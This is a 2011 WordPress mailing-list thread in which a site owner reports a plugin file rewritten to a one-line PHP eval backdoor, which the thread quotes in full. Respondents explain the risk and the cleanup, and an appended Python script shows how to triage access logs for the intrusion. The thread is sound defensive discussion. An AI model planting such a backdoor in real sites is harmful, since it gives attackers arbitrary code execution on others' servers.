[wp-hackers] Possible Exploit

Simon Prosser pross at pross.org.uk
Sun Jun 12 15:19:20 UTC 2011


You should have eval() disabled in php.ini

On 12 June 2011 14:05, Charles Frees-Melvin <wordpress at cefm.ca> wrote:

> That is quite common. Many attacks are from other non-secure sites on the
> same server.
>
> --
> Charles E. Frees-Melvin
> www.cefm.ca
>
> On 2011-06-12, at 10:00, Baki Goxhaj <banago at gmail.com> wrote:
>
> > Wrote to my hosting account. This is what they are saying:
> >
> >> Due to the clustered structure of our systems there is no single log file
> >> for you to use as your site is served by many servers. I would suggest you to
> >> please make a full audit of your account in that regards and remove the
> >> malicious code if you find any.
> >>
> >
> > Crazy - I have like 15 websites on there.
> >
> > Kindly,
> >
> > Baki Goxhaj
> > www.wplancer.com | proverbhunter.com | www.banago.info <http://proverbhunter.com>
> >
> >
> > On Sun, Jun 12, 2011 at 2:14 PM, Dion Hulse (dd32) <wordpress at dd32.id.au> wrote:
> >
> >> Check your access logs for strange requests at the time the file was
> >> detected. You'll hopefully be able to see a POST request to one of the
> >> plugin files at that point in time, or perhaps a long GET request. If you
> >> can narrow down the file attacked, you can work out which plugin has the
> >> vulnerability in it.
> >>
> >> On 12 June 2011 21:59, Baki Goxhaj <banago at gmail.com> wrote:
> >>
> >>> I removed it as soon as I found out about it. I hope my other installs are not
> >>> infected as I don't have the file monitor running there.
> >>>
> >>> Kindly,
> >>>
> >>> Baki Goxhaj
> >>> www.wplancer.com | proverbhunter.com | www.banago.info <http://proverbhunter.com>
> >>>
> >>>
> >>> On Sun, Jun 12, 2011 at 1:56 PM, Jon Cave <jon at lionsgoroar.co.uk> wrote:
> >>>
> >>>> On Sun, Jun 12, 2011 at 12:45 PM, Baki Goxhaj <banago at gmail.com> wrote:
> >>>>> Just got an email from my file monitor plugin that a file had been changed -
> >>>>> it is an inactive plugin file, strangely enough. Here is the content of the
> >>>>> file now:
> >>>>>
> >>>>> <?php if(isset($_REQUEST['asc']))eval(stripslashes($_REQUEST['asc'])); ?>
> >>>>>
> >>>>> Is this something dangerous?
> >>>>
> >>>> Yes this is extremely dangerous. It's basically a backdoor to allow
> >>>> arbitrary PHP code execution on your server. You should remove that
> >>>> code immediately, change passwords, do a full cleanup, etc.
> >>>> _______________________________________________
> >>>> wp-hackers mailing list
> >>>> wp-hackers at lists.automattic.com
> >>>> http://lists.automattic.com/mailman/listinfo/wp-hackers
> >>>>



-- 
My Blog: http://www.pross.org.uk/
Plugins : http://www.pross.org.uk/plugins/
Themes: http://wordpress.org/extend/themes/profile/pross
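
The access-log check suggested in the quoted thread (POSTs to plugin files, or long GET requests, around the time the file changed), as an added example that is not code from any poster in this thread. The log lines, IP addresses, plugin names, change time and the 512-character threshold are constructed assumptions.

```python
import re
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined" style: ip - - [time] "METHOD target PROTO" status size
LINE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
PLUGIN_PHP = re.compile(r"^/wp-content/plugins/.+\.php$")
LONG_QUERY = 512  # assumed cut-off for "a long GET request"

def triage(lines, changed_at, window=timedelta(minutes=30)):
    """Return [(ip, method, path, [reasons])] for suspicious requests near changed_at."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, ts, method, target, _status = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        if abs(when - changed_at) > window:
            continue  # only look near the time the file monitor fired
        path, _, query = target.partition("?")
        reasons = []
        if method == "POST" and PLUGIN_PHP.match(path):
            reasons.append("POST to plugin file")
        if method == "GET" and len(query) > LONG_QUERY:
            reasons.append("long GET query")
        if re.search(r"(?:^|&)asc=", query):
            reasons.append("request carries the backdoor's 'asc' parameter")
        if reasons:
            hits.append((ip, method, path, reasons))
    return hits

# Constructed sample log lines (documentation IP ranges, hypothetical plugin names).
SAMPLE = [
    '192.0.2.10 - - [12/Jun/2011:11:38:02 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Jun/2011:11:39:41 +0000] '
    '"POST /wp-content/plugins/example-plugin/upload.php HTTP/1.1" 200 12',
    '198.51.100.7 - - [12/Jun/2011:11:41:05 +0000] '
    '"GET /wp-content/plugins/old-plugin/old.php?asc=REDACTED HTTP/1.1" 200 40',
    '203.0.113.5 - - [12/Jun/2011:11:42:00 +0000] "GET /?s=' + "A" * 600 + ' HTTP/1.1" 200 100',
    '198.51.100.7 - - [12/Jun/2011:03:00:00 +0000] '
    '"POST /wp-content/plugins/example-plugin/upload.php HTTP/1.1" 200 12',
    '192.0.2.10 - - [12/Jun/2011:11:43:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0',
]
CHANGED_AT = datetime(2011, 6, 12, 11, 40, tzinfo=timezone.utc)  # constructed change time

if __name__ == "__main__":
    for hit in triage(SAMPLE, CHANGED_AT):
        print(hit)
```

Because the backdoor reads $_REQUEST, the 'asc' value can also arrive in a POST body, which access logs do not record; the POST-to-plugin-file rule is what catches that case.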

